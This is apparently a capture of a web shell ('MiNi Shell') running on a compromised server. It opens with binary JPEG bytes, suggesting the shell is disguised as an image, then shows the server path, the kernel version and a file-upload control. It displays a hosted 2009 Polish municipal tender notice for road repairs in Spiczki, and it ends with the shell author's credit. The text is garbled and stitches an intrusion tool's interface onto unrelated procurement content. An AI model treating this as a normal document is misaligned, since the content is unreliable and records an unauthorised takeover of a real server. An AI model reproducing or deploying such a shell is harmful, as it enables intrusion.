JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090515/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090515/150334-N-2009.html

<p class="kh_header"><b>Orla: Remont dróg gminnych ozn. nr geodezyjnymi 287,404,405,433, położonych we wsi Spiczki gm. Orla</b><br>
<b>Numer ogłoszenia: 150334 - 2009; data zamieszczenia: 15.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Orla , ul. Mickiewicza 5, 17-106 Orla, woj. podlaskie, tel. 085 730 57 81, faks 085 730 57 80.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont dróg gminnych ozn. nr geodezyjnymi 287,404,405,433, położonych we wsi Spiczki gm. Orla.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont dróg gminnych: oznaczonej nr geodezyjnym 287 (odcinek A), o długości  130 m; ciągu drogi składającej się z nieruchomości ozn. nr geodezyjnymi 404,405,433 (odcinek B), o długości 141 m, położonych we wsi Spiczki  obejmuje  w szczególności:
1)	roboty ziemne i geodezyjne;
2)	wykonanie zjazdów na działki i drogi boczne oraz poboczy żwirowych;
3)	czyszczenie przepustu na odcinku  B - O 60 oraz wykonanie opaski z betonu;
4)	uzupełnienie, wyrównanie podbudowy z kruszywa naturalnego;
5)	wykonanie nawierzchni jezdni na odcinku A i B z betonu asfaltowego o szerokości 5 m i grubości 5 cm..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7, 45.23.32.23-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Ustala się wadium w wysokości  1500 PLN, (słownie:  jeden tysiąc pięćset PLN).
2.	Wykonawca wnosi wadium przed upływem terminu składania ofert.
3.	Wadium może być wnoszone: 
1)	w pieniądzu - przelewem na konto Zamawiającego nr   18 8061 0003 0001 1471 2000 0050,  
2)	w innej formie wskazanej w art. 45 ust. 6 pkt 2-5 Prawa zamówień publicznych - poprzez  złożenie w kasie Urzędu Gminy, pok. nr 7.
4.	Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego.
5.	Dokument w formie poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne  żądanie Zamawiającego wzywające do zapłaty wadium, zgodnie z warunkiem przetargu, następuje jego bezwarunkowa wpłata bez jakichkolwiek zastrzeżeń. 
6.	Zgodnie z art. 45 ust.5 Prawa zamówień publicznych  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
7.	Zwrot wadium nastąpi na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.
8.	Na wniosek Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą Zamawiający zaliczy wadium wpłacone w pieniądzu na poczet zabezpieczenia należytego wykonania umowy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się oferenci, którzy spełniają
następujące warunki:
1)	posiadają uprawnienia do wykonywania działalności zgodnej z przedmiotem niniejszego zamówienia;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;  
4)	nie podlegają wykluczeniu na podstawie art. 24 ustawy Prawo Zamówień Publicznych;
5)	udzielą co najmniej 36 miesięcznej gwarancji na wykonane roboty budowlane;
6)	 wykażą, że dysponują co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi będącymi przedmiotem zamówienia  o specjalności konstrukcyjno-budowlanej  w  zakresie drogownictwa;
7)	w okresie  ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  zrealizowali co najmniej 3 roboty o podobnym charakterze, przy czym za roboty podobne uważa się: roboty o  wartości kwotowej i długości  nie niższej niż w niniejszym zamówieniu i o podobnym  zakresie tj. wykonanie  nawierzchni bitumicznych.
8)	udzielą co najmniej 30- dniowego terminu płatności..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Informacje o oświadczeniach lub dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu

1. W celu potwierdzenia spełnia warunków udziału w postępowaniu wykonawca składa następujące dokumenty:

1) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej potwierdzające, że profil działalności Wykonawcy odpowiada przedmiotowi zamówienia, wystawione  nie wcześniej niż 6 miesięcy przed terminem składania ofert;
2)  oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust.1 ustawy Prawo Zamówień Publicznych i nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy  zgodnie z załącznikiem Nr 7 do SIWZ ;
3) aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i opłat   lub o uzyskanym przewidzianym prawem zwolnieniu, odroczeniu lub rozłożeniu na raty zaległych płatności wystawione nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert;
 4) aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności wystawione nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert;
 5)  polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności;
 6) wykaz wykonanych podobnych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia  działalności jest krótszy - w tym okresie  /minimum 3 roboty/, odpowiadających  swoim rodzajem i wartością przedmiotowi zamówienia, z podaniem ich wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie - referencje, zawierające nazwę wykonawcy, rodzaj zamówienia, wartość oraz okres realizacji;
      Za roboty podobne uważa się: roboty  o  wartości kwotowej i długości  nie niższej niż w niniejszym zamówieniu i o podobnym  zakresie tj. wykonanie  nawierzchni bitumicznych.
 7) oświadczenie o udzieleniu co najmniej 36 miesięcznej gwarancji liczonej od dnia    odbioru przedmiotu wykonanego zamówienia przez Zamawiającego;
  8) wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat ich kwalifikacji zawodowych, doświadczenia, także zakresu wykonywanych przez nich  czynności niezbędnych do wykonania zamówienia zgodnie z załącznikiem nr 6 do SIWZ. Zamawiający uzna warunki za spełnione, jeżeli wykonawca wykaże, że dysponuje co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi będącymi przedmiotem zamówienia o specjalności konstrukcyjno-budowlanej w zakresie drogownictwa oraz przedłoży dokumenty potwierdzające kwalifikacje tej osoby. W przypadku zamieszczenia  w wykazie osób niezatrudnionych, a którymi Wykonawca będzie dysponował, należy przedłożyć  pisemne zobowiązanie innych podmiotów  o udostępnieniu osób zdolnych do wykonania przedmiotu zamówienia, z załączeniem dokumentów potwierdzających kwalifikacje zawodowe i doświadczenie.
2. Ponadto Wykonawca  powinien dołączyć do oferty następujące dokumenty:
1)	 oświadczenie, że Wykonawca jest lub nie jest podatnikiem podatku od towarów i usług VAT z podaniem numeru identyfikacyjnego;
2)	oświadczenie, że Wykonawca pozostaje związany złożoną przez siebie ofertą przez okres 30 dni od terminu składania ofert;
3)	oświadczenie Wykonawcy, że zapoznał się z treścią SIWZ oraz wzorem umowy i akceptuje jej postanowienia;
4)	 zakres części zamówienia, których wykonanie powierzy podwykonawcom. 
3.	W przypadku wspólnego ubiegania się o zamówienie każdy z Wykonawców musi spełnić warunki zawarte w art. 24 ust. 1 pkt 1-9 oraz w art. 24 ust. 2 pkt 1-2 oraz przedłożyć dokumenty, o których mowa w ust. 1 pkt 1,2,3,4,5. Pozostałe warunki zostaną uznane za spełnione, jeżeli wykonawcy składając ofertę wspólną będą spełniać je łącznie.
4.	W przypadku wspólnego ubiegania się o zamówienie do oferty musi być załączony dokument ustanawiający pełnomocnika konsorcjum do reprezentowania go w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i przy zawarciu umowy w sprawie zamówienia publicznego.
5.	Przed podpisaniem umowy (w przypadku wygrania przetargu) Wykonawcy składający wspólna ofertę są zobowiązani przedstawić umowę konsorcjum, zawierającą co najmniej:
a) zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia,
b) określenie zakresu działania poszczególnych stron umowy,
c) czas obowiązywania umowy, który nie może być krótszy niż okres obejmujący realizacje zamówienia oraz czas trwania  gwarancji..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.orla.samorzady.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Orla
pokój nr 3
ul. MIckiewicza 5 17-106 Orla.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2009 godzina 10:00, miejsce: Urząd Gminy Orla
pokój nr 14 (sekretariat)
ul. Mickiewicza 5
17-106 Orla.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com